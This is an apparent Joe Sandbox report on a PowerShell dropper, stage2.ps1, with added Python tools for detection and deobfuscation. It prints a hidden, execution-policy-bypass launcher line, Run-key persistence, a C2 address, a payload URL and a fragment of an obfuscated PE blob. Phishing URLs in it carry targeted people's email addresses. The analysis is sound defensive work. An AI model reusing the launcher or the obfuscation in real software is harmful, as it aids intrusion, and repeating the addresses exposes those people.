Source: Yara match File source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
ATT&CK matrix, listed by tactic (numeric prefixes are kept as they appear in the report's matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 21 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Scripting; 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 212 Process Injection; 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 212 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 31 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 23 System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 11 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1572999 | Sample: stage2.ps1 | Start date: 11/12/2024 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
Contacted domains: res.cloudinary.com; cloudinary.map.fastly.net

Process tree (indentation shows parent/child; bracketed numbers are the per-process counters shown in the graph for created registry values and files):

powershell.exe [15 25]
  network: cloudinary.map.fastly.net (151.101.193.137), port 443 (local port 49730), FASTLYUS, United States
  dropped: C:\ProgramData\PDF\PDF2.ps1 (ASCII); C:\ProgramData\PDF\1.bat (ASCII)
  signatures: Creates autostart registry keys with suspicious names; Writes to foreign memory regions; Injects a PE file into a foreign processes
  csc.exe [2]
    network: 102.165.46.145, port 333 (local port 49733), RAINBOW-HK Rainbownetworklimited HK, South Africa
  conhost.exe
cmd.exe [1]
  signature: Suspicious powershell command line found
  cmd.exe [1]
    signature: Suspicious powershell command line found
    powershell.exe [13]
      network: 151.101.1.137, port 443 (local ports 49738, 49739), FASTLYUS, United States
      signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
      csc.exe [1]
  conhost.exe
cmd.exe
  cmd.exe [1]
    powershell.exe
      csc.exe
  conhost.exe

Source | Detection | Scanner | Label
stage2.ps1 | 11% | ReversingLabs | Win32.Trojan.Generic
stage2.ps1 | 13% | Virustotal | -
                    No Antivirus matches
Name | IP | Active | Malicious | Reputation
cloudinary.map.fastly.net | 151.101.193.137 | true | false | high
res.cloudinary.com | unknown | unknown | false | high
Name | Malicious | Reputation
https://res.cloudinary.com/dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt | false | high
Name | Source | Malicious | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1883635223.000001C2C62BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://res.cloudinary.com | powershell.exe, 00000000.00000002.1860455437.000001C2B7B48000.00000004.00000800.00020000.00000000.sdmp | false | high
http://cloudinary.map.fastly.net | powershell.exe, 00000000.00000002.1860455437.000001C2B7B48000.00000004.00000800.00020000.00000000.sdmp | false | high
https://res.cloudinary.com | powershell.exe, 00000000.00000002.1860455437.000001C2B7B42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B7A14000.00000004.00000800.00020000.00000000.sdmp | false | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1860455437.000001C2B6267000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1860455437.000001C2B6267000.00000004.00000800.00020000.00000000.sdmp | false | high
https://go.micro | powershell.exe, 00000000.00000002.1860455437.000001C2B6C67000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contoso.com/ | powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1883635223.000001C2C62BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contoso.com/License | powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1860455437.000001C2B5EA1000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1860455437.000001C2B5EA1000.00000004.00000800.00020000.00000000.sdmp | false | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1860455437.000001C2B6267000.00000004.00000800.00020000.00000000.sdmp | false | high
https://res.cloudinary.com/dxtifaxks/raw/upload/v1733864777/asyn | powershell.exe, 00000000.00000002.1860455437.000001C2B793B000.00000004.00000800.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
151.101.1.137 | unknown | United States | 54113 | FASTLYUS | false
151.101.193.137 | cloudinary.map.fastly.net | United States | 54113 | FASTLYUS | false
102.165.46.145 | unknown | South Africa | 134121 | RAINBOW-HKRainbownetworklimitedHK | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572999
Start date and time: 2024-12-11 11:24:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: stage2.ps1
Detection: MAL
Classification: mal100.troj.evad.winPS1@20/13@2/3
EGA Information:
• Successful, ratio: 25%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 23
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .ps1
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target csc.exe, PID 3020 because it is empty
• Execution Graph export aborted for target csc.exe, PID 3156 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:24:59 | API Interceptor | 137x Sleep call for process: powershell.exe modified
05:25:16 | API Interceptor | 10403970x Sleep call for process: csc.exe modified
10:25:17 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run D C:\ProgramData\PDF\1.bat
10:25:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run D C:\ProgramData\PDF\1.bat
IP context (match, then associated sample name / URL | detection | threat name):

151.101.1.137:
  nicegirlforyou.hta | malicious | Cobalt Strike, Remcos
  Invoice A037.xls | malicious | Unknown
  Orden_de_Compra_Nmero_6782929219.xls | malicious | HTMLPhisher
  Aktarma,pdf.vbs | malicious | Remcos
  16547.js | malicious | MassLogger RAT
  #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx | malicious | Remcos
  nr101612_Order.wsf | malicious | Remcos
  1013911.js | malicious | FormBook
  http://itsecurityupdate.com | malicious | Unknown
  https://www.payment.token2049.com/page/3156941?widget=true& | malicious | Unknown

151.101.193.137:
  New Order Enquiry.js | malicious | AgentTesla
  greatnew.doc | malicious | Remcos
  https://link.mail.beehiiv.com/ss/c/SFMS2DGC_3bR2eTtelyfFUzhcGs9TWsEeQw8nQp279J9B9upNohe5IND2DzRg4GfFe3uzMCkwl0VCcFF4p9tdZ71PSC4SlxBXIoR6qgai_e9KXQu46yVwLcidRn-ax90dry5wHpUbN5t2kTBuqVHtjiUR148OM6f2kzv0FbM9-j2d8Pfv1aAiA8m-jIRZ1qPGcwv7cKHtg7zS7k4vguTCgqcLvbDJq61ZPMm3FUyJbd-2ROdV-1aYJVxlO48nGuxkYE6PJ8AjBLfTrwxiX4S2X3JBdpAgH-S1qPrWFIUFnwhW_rcr9w0IZhVJg2k6UwPe0XxcmVm_hXa3Zy0nKOCBvO11zW3IuzS0wT0aqoeUGhUZL_BJAovHWU-78ta_hn0kcmqrlBzh66Yb9lBLgDUfmEypG1yBWRlXPRZ1w7redaJaooKiPuwr2V5n8bXDS9_yWg2USHIOqCrcsTtBGYogmSv3HnV9rD8TCUiXo47xhMBVMzr7StZWjjgT4kZsxK7CX-zIn8YCCC8lkjyOEp6xgdXFjETIB4df5tQm7lBbPlCZ99btsVwezxOnJZ4MV1piJOH9CONfmhGD5405v_OGQ0ddDY5d31qqadrUj9T5uo/422/2hUrqrZHQZSMSqb_7MA2RQ/h1/bXAkiKjrMazQzzpENtDvosiaH2ZRcmZd0aMxcbDunvM | malicious | Unknown
  https://www.searchunify.com | malicious | Unknown

102.165.46.145:
  Plugin81139.js | malicious | PureLog Stealer, RevengeRAT, zgRAT
  aa.LnK.lnk | malicious | Unknown
Domain context (match, then associated sample name / URL | detection | threat name | context IP):

cloudinary.map.fastly.net:
  nicegirlforyou.hta | malicious | Cobalt Strike, Remcos | 151.101.1.137
  invoice09850.xls | malicious | Remcos | 151.101.65.137
  Invoice A037.xls | malicious | Unknown | 151.101.1.137
  Plugin81139.js | malicious | PureLog Stealer, RevengeRAT, zgRAT | 151.101.129.137
  PO-8776-2024.js | malicious | Remcos | 151.101.129.137
  New Order Enquiry.js | malicious | AgentTesla | 151.101.193.137
  NESTLE_MEXICO_Purchase_Order_10122024.xls | malicious | Unknown | 151.101.65.137
  Orden_de_Compra_Nmero_6782929219.xls | malicious | HTMLPhisher | 151.101.65.137
  Aktarma,pdf.vbs | malicious | Remcos | 151.101.1.137
  xxx.doc | malicious | Unknown | 151.101.1.137
ASN context (match, then associated sample name / URL | detection | threat name | context IP):

FASTLYUS:
  nicegirlforyou.hta | malicious | Cobalt Strike, Remcos | 151.101.1.137
  invoice09850.xls | malicious | Remcos | 151.101.65.137
  Invoice A037.xls | malicious | Unknown | 151.101.1.137
  Plugin81139.js | malicious | PureLog Stealer, RevengeRAT, zgRAT | 151.101.129.137
  https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk | malicious | HTMLPhisher | 151.101.2.137
  Nieuwebestellingen10122024.exe | malicious | FormBook | 151.101.1.108
  https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.com | malicious | HTMLPhisher | 151.101.2.137
  Hays eft_Receipt number N302143235953.htm | malicious | Unknown | 151.101.194.137
  EFT Remittance_(Deerequipment)CQDM.html | malicious | Unknown | 151.101.2.137
  https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04 | malicious | Unknown | 151.101.2.137

RAINBOW-HKRainbownetworklimitedHK:
  Plugin81139.js | malicious | PureLog Stealer, RevengeRAT, zgRAT | 102.165.46.145
  la.bot.mips.elf | malicious | Mirai | 64.193.205.186
  Fantazy.arm7.elf | malicious | Mirai | 24.233.26.144
  mpsl.elf | malicious | Unknown | 85.239.34.134
  arm6.elf | malicious | Unknown | 85.239.34.134
  ppc.elf | malicious | Unknown | 85.239.34.134
  mips.elf | malicious | Unknown | 85.239.34.134
  x86.elf | malicious | Unknown | 85.239.34.134
  arm5.elf | malicious | Unknown | 85.239.34.134
  spc.elf | malicious | Unknown | 85.239.34.134
Match: 3b5074b1b5d032e5620f69f9f700ff0e

Associated Sample Name / URL | Detection | Threat Name | Context
nicegirlforyou.hta | malicious | Cobalt Strike, Remcos | 151.101.1.137, 151.101.193.137
nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta | malicious | Cobalt Strike, Remcos | 151.101.1.137, 151.101.193.137
Plugin81139.js | malicious | PureLog Stealer, RevengeRAT, zgRAT | 151.101.1.137, 151.101.193.137
Reqt 83291.vbs | malicious | Remcos, GuLoader | 151.101.1.137, 151.101.193.137
https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk | malicious | HTMLPhisher | 151.101.1.137, 151.101.193.137
https://smialex.id/Frbleuelsas | malicious | Anonymous Proxy | 151.101.1.137, 151.101.193.137
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 151.101.1.137, 151.101.193.137
Bank Swift and SOA PVRN0072700314080353_pdf.exe | malicious | GuLoader, MassLogger RAT | 151.101.1.137, 151.101.193.137
QUOTATION#08670.exe | malicious | AgentTesla | 151.101.1.137, 151.101.193.137
DEC 2024 RFQ.exe | malicious | Snake Keylogger, VIP Keylogger | 151.101.1.137, 151.101.193.137
                                                                                        No context
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):87
                                                                                        Entropy (8bit):4.903524927696563
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:xFKyAJJFIeUrh5RI8FW5edZkREpV93:xFs8P1PfW5e803
                                                                                        MD5:1CBC85BAE64F53DA87B548571326A3E1
                                                                                        SHA1:A74515A088DB3391ED19A83B5FD47002E986FBC9
                                                                                        SHA-256:48D4BFCBC45665CD7E97DE1D62143AE49376184240993D90D18951DB48E1196D
                                                                                        SHA-512:F8E3FC8B8A21A932EDBBC75B48590F28BF0107930F8B58450C46B2B96D86D5169D06F7A8A0CD2737801E8BB7480BA7FC5D0E88F4B972C8B7EB0769E3663B55A9
                                                                                        Malicious:true
Preview (leading and trailing line breaks, shown as dots in the extraction, removed; the content is exactly what stage2.ps1 writes to C:\ProgramData\PDF\1.bat, so this is that launcher):
CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
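The launcher above spells its switches as -NOP, -WIND, -eXEC and -NONI in mixed case. powershell.exe accepts any prefix of a parameter name once it is long enough to be unambiguous, which is why the report's "Suspicious PowerShell Parameter Substring" Sigma hit fires on this command line and why a rule that only matches the full spelling -WindowStyle Hidden -ExecutionPolicy Bypass would miss it. The Python below is an added example and is not code from the Joe Sandbox report or from the sample: it canonicalises such a command line before rule matching and then flags the hidden-window, execution-policy-bypass launcher pattern. The switch table and the minimum-abbreviation rule are a reconstruction of the Windows PowerShell console host's behaviour (an assumption, not an authoritative list), and the sample command line is constructed from the 1.bat preview.

```python
"""Canonicalise abbreviated powershell.exe switches and flag the hidden-window,
ExecutionPolicy-bypass launcher pattern seen in the dropped 1.bat.

Added example, not code from the report or the sample."""
import re

# (canonical name, shortest accepted abbreviation). Reconstruction of the
# Windows PowerShell console-host rule (assumption): a switch is accepted when
# it is at least as long as the abbreviation and is a case-insensitive prefix
# of the canonical name, so -NOP, -WIND, -eXEC and -NONI all resolve.
SWITCHES = [
    ("NoProfile", "nop"), ("NonInteractive", "noni"), ("NoLogo", "nol"),
    ("NoExit", "noe"), ("WindowStyle", "w"), ("ExecutionPolicy", "ex"),
    ("EncodedCommand", "e"), ("Command", "c"), ("File", "f"), ("Sta", "s"),
    ("Mta", "mta"), ("Version", "v"), ("InputFormat", "inp"),
    ("OutputFormat", "o"), ("PSConsoleFile", "psc"), ("ConfigurationName", "config"),
]
ALIASES = {"ep": "ExecutionPolicy", "ec": "EncodedCommand"}  # explicit short forms
VALUE_SWITCHES = {"WindowStyle", "ExecutionPolicy", "EncodedCommand", "Version",
                  "InputFormat", "OutputFormat", "PSConsoleFile", "ConfigurationName"}
REST_SWITCHES = {"Command", "File"}   # the remainder of the line is their value
HOSTS = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}


def resolve_switch(token):
    """Map an abbreviated switch such as -eXEC to its canonical name, or None."""
    key = token.lstrip("-/").lower()
    if key in ALIASES:
        return ALIASES[key]
    for name, shortest in SWITCHES:
        if len(key) >= len(shortest) and name.lower().startswith(key):
            return name
    return None


def tokenize(cmdline):
    """Split on whitespace but keep double-quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_powershell(cmdline):
    """Return the canonical switches of the first powershell invocation in cmdline."""
    toks = tokenize(cmdline)
    start = next((i for i, t in enumerate(toks)
                  if t.lower().rsplit("\\", 1)[-1] in HOSTS), None)
    if start is None:
        return None
    parsed = {"positional": []}
    i = start + 1
    while i < len(toks):
        tok = toks[i]
        if len(tok) > 1 and tok[0] in "-/":
            name = resolve_switch(tok)
            if name in REST_SWITCHES:
                parsed[name] = " ".join(toks[i + 1:])
                break
            if name in VALUE_SWITCHES:
                value = toks[i + 1] if i + 1 < len(toks) else ""
                if name in ("WindowStyle", "ExecutionPolicy"):
                    value = value.capitalize()          # HIDDEN -> Hidden, BYPASS -> Bypass
                parsed[name] = value
                i += 2
                continue
            parsed[name or tok] = True                  # unknown switches are kept verbatim
        else:
            # Windows PowerShell 5.1 treats a bare argument as -Command text,
            # so a quoted script path here still runs the script.
            parsed["positional"].append(tok)
        i += 1
    return parsed


def canonical(parsed):
    """Render the parsed invocation with full parameter names for rule matching."""
    parts = ["powershell.exe"]
    for name, value in parsed.items():
        if name == "positional":
            continue
        parts.append(f"-{name}" if value is True else f"-{name} {value}")
    parts.extend(f'"{p}"' for p in parsed["positional"])
    return " ".join(parts)


def launcher_flags(parsed):
    """Reasons the invocation matches the hidden launcher pattern (empty if none)."""
    reasons = []
    if parsed.get("WindowStyle") == "Hidden":
        reasons.append("hidden window")
    if parsed.get("ExecutionPolicy") in ("Bypass", "Unrestricted"):
        reasons.append("execution policy " + parsed["ExecutionPolicy"].lower())
    if parsed.get("NonInteractive") is True:
        reasons.append("non-interactive")
    if parsed.get("NoProfile") is True:
        reasons.append("no profile")
    if parsed.get("EncodedCommand"):
        reasons.append("encoded command")
    return reasons


# Constructed from the 1.bat content shown in the dropped-file preview.
SAMPLE_BAT = 'CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\\ProgramData\\PDF\\PDF2.ps1"'

if __name__ == "__main__":
    parsed = parse_powershell(SAMPLE_BAT)
    print(canonical(parsed))
    print(launcher_flags(parsed))
```

Run the canonical form, not the raw command line, through detection rules; the same launcher appears again in the File Content Preview of stage2.ps1 further down, written by the first stage into 1.bat.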
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with very long lines (65418)
                                                                                        Category:dropped
                                                                                        Size (bytes):946147
                                                                                        Entropy (8bit):2.754767777877841
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:ja3hajoDS2VvhVHzHc4abdm6NNNmy7aBo428Ok8Z3k+:jaEjo22VpJb1abdm6NNNmy7v428M
                                                                                        MD5:8BDC3CCB0FBFDC015E8C18F8E29464E6
                                                                                        SHA1:4EC3326B9ABE35C36478340FB8F9614FEA41A850
                                                                                        SHA-256:1667AD0FC29FCD40AB17963A9BA023626B552FAAEC902E32CFC2B26A9880B0DD
                                                                                        SHA-512:27ACE506208B33C3EF6A981CC21CF05E297C02B7F37E5C31E6F965F8405E7166439F4DE8594DE4686BD6D2E717FEEE0593D1EB64487FDF2296F1760F893407CD
                                                                                        Malicious:true
Preview (line breaks restored; the file is consistent with C:\ProgramData\PDF\PDF2.ps1, which 1.bat launches, and its ssdeep is near-identical to stage2.ps1's, so it is the bulk of stage2.ps1 written back out; the csc.exe path is split into three concatenated literals and the embedded base64 blob has every 'A' replaced by the token in $LzWPz):
$sZvfP = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'csc.exe';
$LzWPz = '$$$_$$$';
$sbBkV = 'A';
$ummtu = 'TVqQ$$$_$$$$$$_$$$M$$$_$$$$$$_$$$$$$_$$$$$$_$$$E$$$_$$$$$$_$$$$$$_$$$$$$_$$$//8$$$_$$$$$$_$$$Lg$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$Q$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$g$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$4fug4$$$_$$$t$$$_$$$nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$BQRQ$$$_$$$$$$_$$$T$$$_$$$ED$$$_$$$PZbJK8$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$O$$$_$$$$$$_$$$DiEL$$$_$$$V$$$_$$$$$$_$$$$$$_$$$P$$$_$$$D$$$_$$$$$$_$$$$$$_$$$G$$$_$$$$ (truncated in the report)
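Swapping the '$$$_$$$' token back for 'A' in the $ummtu string gives TVqQAAMAAAAEAAAA//8AALgA..., the base64 of an MZ/PE header, followed a little later by the DOS-stub text "This program cannot be run in DOS mode." The token padding breaks the long runs of base64 alphabet that simple scanners key on, and the blob decodes to the executable that the csc.exe reference (the report's "Compiles C# or VB.Net code" signature) then loads. The Python below is an added example, not code from the report or the dropper: it reverses the substitution on the fragment visible in the preview and checks the result for a PE header. The run of tokens between 'Q' and 'g' is not reproduced in full from the preview and is filled in here with 47 tokens, the zero bytes of the DOS header (constructed), and the direction of the substitution (token to 'A') is inferred from the two variable assignments.

```python
"""Reverse the '$$$_$$$' -> 'A' substitution used in the dropped PDF2.ps1 and
confirm the reassembled base64 is a PE image.

Added example, not code from the report or the dropper."""
import base64
import re

TOKEN = "$$$_$$$"   # $LzWPz in the dropper
FILL = "A"          # $sbBkV in the dropper

# Obfuscated base64 as it appears in the report preview of PDF2.ps1. The run
# of 47 tokens between 'Q' and 'g' (zero bytes of the DOS header) is filled in
# here rather than copied from the preview: constructed, not verbatim.
OBF_SAMPLE = (
    "TVqQ" + TOKEN * 2 + "M" + TOKEN * 4 + "E" + TOKEN * 4 + "//8" + TOKEN * 2
    + "Lg" + TOKEN * 9 + "Q" + TOKEN * 47 + "g" + TOKEN * 5
    + "4fug4" + TOKEN + "t" + TOKEN + "nNIbgBTM0h"
    + "VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ"
    + TOKEN * 9 + "BQRQ"
)

B64_RE = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def looks_like_base64(s):
    """Naive check a scanner might use: only base64 alphabet characters."""
    return bool(B64_RE.match(s))


def deobfuscate(blob, token=TOKEN, fill=FILL):
    """Undo the substitution: every token stands for one fill character."""
    return blob.replace(token, fill)


def decode_prefix(b64):
    """Decode as many whole 4-character groups as the fragment contains."""
    usable = b64[: len(b64) - len(b64) % 4]
    return base64.b64decode(usable)


def pe_header_info(data):
    """Return (is_mz, e_lfanew, has_dos_stub_text) for a decoded fragment."""
    is_mz = data[:2] == b"MZ"
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little") if len(data) >= 0x40 else None
    stub = b"This program cannot be run in DOS mode" in data
    return is_mz, e_lfanew, stub


def analyse(blob):
    """Triage one obfuscated blob: does it hide a PE, and would a raw scan see it?"""
    plain = deobfuscate(blob)
    data = decode_prefix(plain)
    is_mz, e_lfanew, stub = pe_header_info(data)
    return {
        "raw_looks_base64": looks_like_base64(blob),
        "deobfuscated_looks_base64": looks_like_base64(plain),
        "decoded_bytes": len(data),
        "is_mz": is_mz,
        "e_lfanew": e_lfanew,
        "dos_stub_text": stub,
    }


if __name__ == "__main__":
    for key, value in analyse(OBF_SAMPLE).items():
        print(f"{key}: {value}")
```

On the full dropped file the same replace() followed by a complete base64 decode yields the PE; the e_lfanew of 0x80 recovered from the fragment is where the "PE\0\0" signature begins, which is also why the preview shows "BQRQ" right after the nine tokens that follow the DOS-stub text.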
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):321
                                                                                        Entropy (8bit):5.36509199858051
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                        MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                        SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                        SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
